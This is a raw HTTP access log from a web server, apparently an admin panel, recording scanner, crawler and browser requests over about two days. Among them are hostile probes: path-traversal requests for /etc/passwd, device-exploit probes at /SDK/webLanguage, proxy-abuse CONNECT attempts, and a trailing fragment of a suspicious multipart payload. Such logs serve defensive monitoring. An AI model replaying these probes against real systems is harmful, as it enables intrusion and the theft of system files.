RemoteAddr: 85.142.100.135:51822
Path: /
URL: /
Method: GET
[2026-03-30 18:54:18] === HTTP Request ===
[2026-03-30 18:52:17] Main page accessed - IP: 198.235.24.77:63680
===================
Accept-Encoding: gzip
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 198.235.24.77:63680
Path: /
URL: /
Method: GET
[2026-03-30 18:52:17] === HTTP Request ===
[2026-03-30 18:04:31] Salary page accessed - IP: 172.30.0.12:56160
===================
Accept-Encoding: gzip, br, deflate
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Openai-Host-Hash: 867116608
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Referer: https://admin.vulnberries.ru/
From: gptbot(at)openai.com
X-Forwarded-Proto: https
X-Forwarded-For: 74.7.227.48
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:56160
Path: /salary
URL: /salary
Method: GET
[2026-03-30 18:04:31] === HTTP Request ===
[2026-03-30 18:04:29] Logs page accessed - IP: 172.30.0.12:56160
===================
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
X-Forwarded-For: 74.7.227.48
Referer: https://admin.vulnberries.ru/
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
From: gptbot(at)openai.com
Accept-Encoding: gzip, br, deflate
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:56160
Path: /logs
URL: /logs
Method: GET
[2026-03-30 18:04:29] === HTTP Request ===
[2026-03-30 18:04:27] Defects page accessed - IP: 172.30.0.12:56160
===================
X-Openai-Host-Hash: 867116608
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 74.7.227.48
Referer: https://admin.vulnberries.ru/
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Forwarded-Proto: https
Via: 2.0 Caddy
From: gptbot(at)openai.com
Accept-Encoding: gzip, br, deflate
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:56160
Path: /defects
URL: /defects
Method: GET
[2026-03-30 18:04:27] === HTTP Request ===
[2026-03-30 18:04:24] Goods page accessed - IP: 172.30.0.12:56160
===================
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Referer: https://admin.vulnberries.ru/
From: gptbot(at)openai.com
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
X-Forwarded-For: 74.7.227.48
Accept-Encoding: gzip, br, deflate
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:56160
Path: /goods
URL: /goods
Method: GET
[2026-03-30 18:04:24] === HTTP Request ===
===================
Referer: https://admin.vulnberries.ru/
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
From: gptbot(at)openai.com
Accept-Encoding: gzip, br, deflate
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 74.7.227.48
Via: 2.0 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:56160
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-30 18:04:22] === HTTP Request ===
===================
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 74.7.241.183
Via: 2.0 Caddy
From: oai-searchbot(at)openai.com
Accept-Encoding: gzip, br, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:56160
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-30 18:04:16] === HTTP Request ===
[2026-03-30 18:04:16] Main page accessed - IP: 172.30.0.12:56160
===================
X-Openai-Host-Hash: 867116608
X-Forwarded-Host: admin.vulnberries.ru
From: gptbot(at)openai.com
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Forwarded-Proto: https
X-Forwarded-For: 74.7.227.48
Via: 2.0 Caddy
Accept-Encoding: gzip, br, deflate
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:56160
Path: /
URL: /
Method: GET
[2026-03-30 18:04:16] === HTTP Request ===
===================
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0
Connection: close
Accept-Language: en-US,en;q=0.5
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 91.231.89.206:37079
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-30 17:39:13] === HTTP Request ===
[2026-03-30 17:36:56] Main page accessed - IP: 91.196.152.38:38015
===================
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0
Connection: close
Accept-Language: en-US,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 91.196.152.38:38015
Path: /
URL: /
Method: GET
[2026-03-30 17:36:56] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0
Priority: u=0, i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
Sec-Fetch-User: ?1
Sec-Fetch-Mode: navigate
X-Forwarded-For: 68.183.139.34
Sec-Fetch-Dest: document
Referer: https://admin.vulnberries.ru/
Accept-Encoding: gzip, deflate
X-Forwarded-Host: admin.vulnberries.ru
Via: 1.1 Caddy
Sec-Fetch-Site: none
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:33268
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-30 16:04:52] === HTTP Request ===
[2026-03-30 16:04:49] Main page accessed - IP: 172.30.0.12:33268
===================
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Accept-Encoding: gzip, deflate
X-Forwarded-For: 68.183.139.34
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
X-Forwarded-Proto: https
Via: 1.1 Caddy
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0
Priority: u=0, i
Accept-Language: en-US,en;q=0.5
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:33268
Path: /
URL: /
Method: GET
[2026-03-30 16:04:49] === HTTP Request ===
===================
X-Forwarded-For: 204.76.203.25
Via: 1.1 Caddy
Accept-Encoding: identity
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:47010
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-30 13:22:33] === HTTP Request ===
===================
Accept-Encoding: gzip, deflate, gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Accept: */*
Accept-Language: en US,en;q=0.9,sv;q=0.8
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.61.209.107:18898
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-03-30 13:16:03] === HTTP Request ===
===================
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.187.35.142:19920
Path: /../../../../../../etc/passwd
URL: /..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
Method: GET
[2026-03-30 13:00:36] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 123.58.215.102:59574
Path: /sitemap.xml
URL: /sitemap.xml
Method: GET
[2026-03-30 12:55:59] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 123.58.215.102:59570
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-30 12:55:59] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 123.58.215.102:59386
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-30 12:55:59] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 123.58.215.102:59270
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-30 12:55:58] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 123.58.215.102:59114
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-30 12:55:58] === HTTP Request ===
[2026-03-30 12:55:57] Main page accessed - IP: 123.58.215.102:58944
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 9_2) AppleWebKit/549.51 (KHTML, like Gecko) Chrome/78.0.1203 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 123.58.215.102:58944
Path: /
URL: /
Method: GET
[2026-03-30 12:55:57] === HTTP Request ===
[2026-03-30 12:54:37] Main page accessed - IP: 152.32.206.74:39932
===================
Accept: */*
User-Agent: curl/7.29.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 152.32.206.74:39932
Path: /
URL: /
Method: GET
[2026-03-30 12:54:37] === HTTP Request ===
[2026-03-30 12:08:34] Main page accessed - IP: 34.38.195.167:36040
===================
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.38.195.167:36040
Path: /
URL: /
Method: GET
[2026-03-30 12:08:34] === HTTP Request ===
[2026-03-30 11:47:52] Main page accessed - IP: 112.124.58.64:43744
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
Accept-Language: zh-CN,zh;q=0.8
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 112.124.58.64:43744
Path: /
URL: /
Method: GET
[2026-03-30 11:47:52] === HTTP Request ===
[2026-03-30 09:34:01] Main page accessed - IP: 185.247.137.179:42815
===================
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 185.247.137.179:42815
Path: /
URL: /
Method: GET
[2026-03-30 09:34:01] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:46918
Path: /jars
URL: /jars
Method: GET
[2026-03-30 07:26:36] === HTTP Request ===
===================
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Accept-Language: en US,en;q=0.9,sv;q=0.8
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate, gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 91.224.92.125:42464
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-03-30 06:07:51] === HTTP Request ===
[2026-03-30 03:51:21] Main page accessed - IP: 95.215.0.144:38044
===================
User-Agent: fasthttp
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 95.215.0.144:38044
Path: /
URL: /
Method: GET
[2026-03-30 03:51:21] === HTTP Request ===
[2026-03-30 02:42:42] Main page accessed - IP: 205.210.31.241:50778
===================
Accept: */*
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 205.210.31.241:50778
Path: /
URL: /
Method: GET
[2026-03-30 02:42:42] === HTTP Request ===
[2026-03-30 01:35:11] Main page accessed - IP: 176.65.149.45:37490
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:37490
Path: /
URL: /
Method: GET
[2026-03-30 01:35:11] === HTTP Request ===
===================
Accept-Encoding: gzip, deflate, gzip, deflate
Accept-Language: en US,en;q=0.9,sv;q=0.8
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.61.209.107:23338
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-03-30 01:25:26] === HTTP Request ===
===================
Sec-Fetch-Dest: document
Sec-Ch-Ua-Platform: "Linux"
Sec-Ch-Ua: "Chromium";v="142", "Not:A-Brand";v="24", "Brave";v="142"
Sec-Fetch-User: ?1
Accept-Language: en-US,en;q=0.5
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Sec-Gpc: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Sec-Ch-Ua-Mobile: ?0
Connection: keep-alive
Sec-Fetch-Mode: navigate
Referer: http://95.143.191.38:8081/
Accept-Encoding: gzip, deflate
Sec-Fetch-Site: none
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 157.230.112.26:35056
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-30 01:16:18] === HTTP Request ===
[2026-03-30 01:16:18] Main page accessed - IP: 157.230.112.26:35044
===================
Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Accept-Encoding: gzip, deflate
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Sec-Fetch-Dest: document
Sec-Gpc: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Chromium";v="142", "Not:A-Brand";v="24", "Brave";v="142"
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Ch-Ua-Platform: "Linux"
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 157.230.112.26:35044
Path: /
URL: /
Method: GET
[2026-03-30 01:16:18] === HTTP Request ===
[2026-03-30 00:44:51] Main page accessed - IP: 198.235.24.118:62766
===================
Accept-Encoding: gzip
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 198.235.24.118:62766
Path: /
URL: /
Method: GET
[2026-03-30 00:44:51] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:51880
Path: /jars
URL: /jars
Method: GET
[2026-03-30 00:00:38] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +https://www.cyberok.ru/policy.html)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.106:42928
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-29 23:36:29] === HTTP Request ===
[2026-03-29 23:36:29] Main page accessed - IP: 85.142.100.106:42922
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +https://www.cyberok.ru/policy.html)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.106:42922
Path: /
URL: /
Method: GET
[2026-03-29 23:36:29] === HTTP Request ===
[2026-03-29 21:50:29] Main page accessed - IP: 172.30.0.12:43256
===================
Accept-Encoding: gzip
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 205.210.31.151
Via: 1.1 Caddy
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:43256
Path: /
URL: /
Method: GET
[2026-03-29 21:50:29] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +``https://www.cyberok.ru/policy.html)
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.143:60698
Path: /nl/colo/index.html
URL: /nl/colo/index.html
Method: GET
[2026-03-29 21:40:33] === HTTP Request ===
===================
User-Agent: Python/3.9 python-socks/2.0.3
Headers:
Protocol: HTTP/1.1
Host: 185.65.245.10:7227
RemoteAddr: 176.65.148.2:13918
Path:
URL: //185.65.245.10:7227
Method: CONNECT
[2026-03-29 21:21:07] === HTTP Request ===
[2026-03-29 19:55:00] Main page accessed - IP: 207.90.244.20:40406
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 207.90.244.20:40406
Path: /
URL: /
Method: GET
[2026-03-29 19:55:00] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 203.55.131.5:34698
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-29 19:48:52] === HTTP Request ===
[2026-03-29 19:48:23] Main page accessed - IP: 203.55.131.5:36734
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 203.55.131.5:36734
Path: /
URL: /
Method: GET
[2026-03-29 19:48:23] === HTTP Request ===
[2026-03-29 19:08:37] Main page accessed - IP: 66.132.195.42:6568
===================
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.195.42:6568
Path: /
URL: /
Method: GET
[2026-03-29 19:08:37] === HTTP Request ===
===================
User-Agent: Python/3.9 python-socks/2.0.3
Headers:
Protocol: HTTP/1.1
Host: 185.65.245.10:7227
RemoteAddr: 176.65.134.3:29136
Path:
URL: //185.65.245.10:7227
Method: CONNECT
[2026-03-29 18:35:18] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, gzip, deflate
Accept: */*
Accept-Language: en US,en;q=0.9,sv;q=0.8
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 91.224.92.125:60578
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-03-29 17:26:38] === HTTP Request ===
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 198.235.24.91:61656
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-03-29 17:13:22] === HTTP Request ===
[2026-03-29 17:11:11] Main page accessed - IP: 172.30.0.12:35380
===================
Via: 1.1 Caddy
Accept-Encoding: identity
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 204.76.203.25
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:35380
Path: /
URL: /
Method: GET
[2026-03-29 17:11:11] === HTTP Request ===
[2026-03-29 14:32:55] Login page accessed - IP: 193.142.146.230:57748
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.142.146.230:57748
Path: /login
URL: /login
Method: GET
[2026-03-29 14:32:55] === HTTP Request ===
===================
Accept-Language: en US,en;q=0.9,sv;q=0.8
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Accept: */*
Accept-Encoding: gzip, deflate, gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.61.209.107:5410
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-03-29 13:21:37] === HTTP Request ===
[2026-03-29 12:18:13] Main page accessed - IP: 198.235.24.82:51301
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Accept: */*
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 198.235.24.82:51301
Path: /
URL: /
Method: GET
[2026-03-29 12:18:13] === HTTP Request ===
===================
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.215:64708
Path: /../../../../../../etc/passwd
URL: /..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
Method: GET
[2026-03-29 11:38:49] === HTTP Request ===
[2026-03-29 11:09:58] Main page accessed - IP: 66.228.53.136:36888
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.228.53.136:36888
Path: /
URL: /
Method: GET
[2026-03-29 11:09:58] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.217.140.36:39712
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-29 10:52:07] === HTTP Request ===
[2026-03-29 10:52:07] Main page accessed - IP: 85.217.140.36:39700
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; ModatScanner/1.2; +https://modat.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.217.140.36:39700
Path: /
URL: /
Method: GET
[2026-03-29 10:52:07] === HTTP Request ===
[2026-03-29 10:19:16] Main page accessed - IP: 34.22.172.118:57382
===================
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.22.172.118:57382
Path: /
URL: /
Method: GET
[2026-03-29 10:19:16] === HTTP Request ===
[2026-03-29 09:56:10] Main page accessed - IP: 172.105.128.12:42498
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 172.105.128.12:42498
Path: /
URL: /
Method: GET
[2026-03-29 09:56:10] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Connection: close
Headers:
Protocol: HTTP/1.1
Host: proxy.flarevpn.digital:8080
RemoteAddr: 170.64.168.71:36158
Path: /judge
URL: http://proxy.flarevpn.digital:8080/judge
Method: GET
[2026-03-29 07:45:50] === HTTP Request ===
===================
User-Agent: Go-http-client/1.1
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: proxy.flarevpn.digital:8080
RemoteAddr: 170.64.168.71:36142
Path: /judge
URL: http://proxy.flarevpn.digital:8080/judge
Method: GET
[2026-03-29 07:45:50] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: proxy.flarevpn.digital:8080
RemoteAddr: 170.64.168.71:22794
Path: /judge
URL: http://proxy.flarevpn.digital:8080/judge
Method: GET
[2026-03-29 07:45:49] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:52030
Path: /jars
URL: /jars
Method: GET
[2026-03-29 06:52:06] === HTTP Request ===
[2026-03-29 06:34:19] Main page accessed - IP: 45.33.12.214:35459
===================
User-Agent: Mozilla/5.0 zgrab/0.x
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 45.33.12.214:35459
Path: /
URL: /
Method: GET
[2026-03-29 06:34:19] === HTTP Request ===
===================
------WebKitFormBoundaryx120073524507--
------WebKitFormBoundaryx120073524507
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx120073524507
